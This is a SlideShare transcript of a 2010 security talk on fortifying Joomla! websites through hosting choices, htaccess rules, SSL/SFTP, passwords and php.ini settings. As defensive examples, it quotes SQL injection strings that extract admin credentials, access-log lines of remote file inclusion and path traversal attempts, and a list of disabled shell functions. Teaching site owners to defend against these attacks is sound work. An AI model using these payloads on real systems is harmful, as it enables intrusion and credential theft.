Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
Security talk:  Fortifying your  Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu...
Where to start? <ul><li>Long before you go on-line
Choose the right hosting
Choose the right components
Inform yourself about good practices ....
.... it means:
You're right here :) </li></ul>Copyright 2010, Sigsiu.NET GmbH
<ul>Choose the right host </ul><ul><li>Apache 2
PHP 5
MySQL 5
htaccess support
Safe Mode Off !!!
Register Globals Off !!!
Access via SFTP
HTTPS/SSL support </li></ul>Copyright 2010, Sigsiu.NET GmbH
<ul>Choose right components </ul><ul>Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions...
Installing Joomla! Copyright 2010, Sigsiu.NET GmbH
Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyrig...
The point is: be unconventional! <ul><li>Default username is “Admin”
User ID of the first super admin is 62 </li></ul>index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,passw...
Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH
Main problem <ul>we have to deal with kids with too much time </ul>“ A scriptkiddie, usually a teenager, is a person of  l...
Scriptkiddies <ul><li>Are sometimes randomly successful
Are ambitious
In most cases causing “only” heavy load:
Default Joomla! Site: </li></ul><ul>( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x </ul>...
htaccess – powerful weapon  .htaccess - (hypertext  access) is the default name of a directory-level configuration file th...
Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH
Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] &quot;GET / /administrator/components/com_remos...
Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1&quot;...
Nächste SlideShare
Wird geladen in …5
×

Security talk: Fortifying your Joomla! website

  • Als Erste(r) kommentieren

Security talk: Fortifying your Joomla! website

  1. 1. Security talk: Fortifying your Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
  2. 2. Where to start? <ul><li>Long before you go on-line
  3. 3. Choose the right hosting
  4. 4. Choose the right components
  5. 5. Inform yourself about good practices ....
  6. 6. .... it means:
  7. 7. You're right here :) </li></ul>Copyright 2010, Sigsiu.NET GmbH
  8. 8. <ul>Choose the right host </ul><ul><li>Apache 2
  9. 9. PHP 5
  10. 10. MySQL 5
  11. 11. htaccess support
  12. 12. Safe Mode Off !!!
  13. 13. Register Globals Off !!!
  14. 14. Access via SFTP
  15. 15. HTTPS/SSL support </li></ul>Copyright 2010, Sigsiu.NET GmbH
  16. 16. <ul>Choose right components </ul><ul>Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions List regularly http://docs.joomla.org/Vulnerable_Extensions_List </ul>Copyright 2010, Sigsiu.NET GmbH
  17. 17. Installing Joomla! Copyright 2010, Sigsiu.NET GmbH
  18. 18. Typical hack attempt ...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/ jos_users /* Copyright 2010, Sigsiu.NET GmbH
  19. 19. The point is: be unconventional! <ul><li>Default username is “Admin”
  20. 20. User ID of the first super admin is 62 </li></ul>index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,password+FROM+ jos_users +WHERE+ id=62 ... Copyright 2010, Sigsiu.NET GmbH
  21. 21. Change the super admin user ID http://sobi.it/SuperAdmin/62/ Copyright 2010, Sigsiu.NET GmbH
  22. 22. Main problem <ul>we have to deal with kids with too much time </ul>“ A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief” - source Copyright 2010, Sigsiu.NET GmbH
  23. 23. Scriptkiddies <ul><li>Are sometimes randomly successful
  24. 24. Are ambitious
  25. 25. In most cases causing “only” heavy load:
  26. 26. Default Joomla! Site: </li></ul><ul>( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x </ul>Scriptkiddies up to 100 hack attempts in a minute Copyright 2010, Sigsiu.NET GmbH
  27. 27. htaccess – powerful weapon .htaccess - (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess Copyright 2010, Sigsiu.NET GmbH
  28. 28. Default Joomla! htaccess Copyright 2010, Sigsiu.NET GmbH
  29. 29. Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] &quot;GET / /administrator/components/com_remository/admin.remository.php ?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1&quot; 404 95 &quot;Mozilla/5.0&quot; Copyright 2010, Sigsiu.NET GmbH
  30. 30. Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1&quot; 403 1043 &quot; libwww-perl /5.829 GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1&quot; 403 1029 &quot;Mozilla/3.0 (compatible; Indy Library ) GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1&quot; 403 1029 &quot; Wget /1.1 (compatible; i486; Linux; RedHat7.3) Copyright 2010, Sigsiu.NET GmbH
  31. 31. Prevent most common SQL-Injections 2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] &quot;GET /index.php?option=com_xxxx &id=1/**/ union /**/ select /**/1, concat (username,0x3a,password)... Copyright 2010, Sigsiu.NET GmbH
  32. 33. Disclose as little information as possible
  33. 34. Admin Panel Log-In & FTP
  34. 35. Who can see it? Copyright 2010, Sigsiu.NET GmbH
  35. 36. HTTPS/SSL & SFTP <ul><li>Use SFTP instead of FTP
  36. 37. Use HTTPS for log-in </li></ul>Copyright 2010, Sigsiu.NET GmbH
  37. 38. HTTPS/SSL & SFTP - Problems <ul><li>Provider have to offer SSH/SFTP
  38. 39. Provider have to offer SSL or SSL-Proxy
  39. 40. Invalid SSL-Cert throws error in browser
  40. 41. Valid SSL-Certificates are expensive </li></ul>Copyright 2010, Sigsiu.NET GmbH
  41. 42. HTTPS/SSL - Problems <ul><li>Valid SSL-Certificates are expensive </li></ul>https://www.startssl.com/ Copyright 2010, Sigsiu.NET GmbH
  42. 43. Username & Password <ul>Username is almost so important as password </ul>… once again Copyright 2010, Sigsiu.NET GmbH
  43. 44. Username & Password <ul>Automatic generated password: k5dRGCUxGs </ul>… once again Copyright 2010, Sigsiu.NET GmbH
  44. 45. Username & Password <ul>If we can articulate something, we can remember it </ul>… once again https://pass.sigsiu.net/ Copyright 2010, Sigsiu.NET GmbH
  45. 46. File permissions <ul>Very unlucky number: 777 </ul>Copyright 2010, Sigsiu.NET GmbH
  46. 47. php.ini <ul><li>Disable “dangerous” functions ??!! disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
  47. 48. how can a function be dangerous ??
  48. 49. Use open_basedir
  49. 50. open_basedir = /path/to/www </li></ul>Copyright 2010, Sigsiu.NET GmbH
  50. 51. Is your computer safe? <ul>“ There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.” Brian Teeman </ul>Copyright 2010, Sigsiu.NET GmbH
  51. 52. But what if .... ? <ul>Backup, Backup, Backup ..... and one more time: Backup </ul>Copyright 2010, Sigsiu.NET GmbH
  52. 53. Thank you for your attention! http://www.Sigsiu.NET https://shop.Sigsiu.NET http://joomla.Sigsiu.NET http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html Copyright 2010, Sigsiu.NET GmbH

×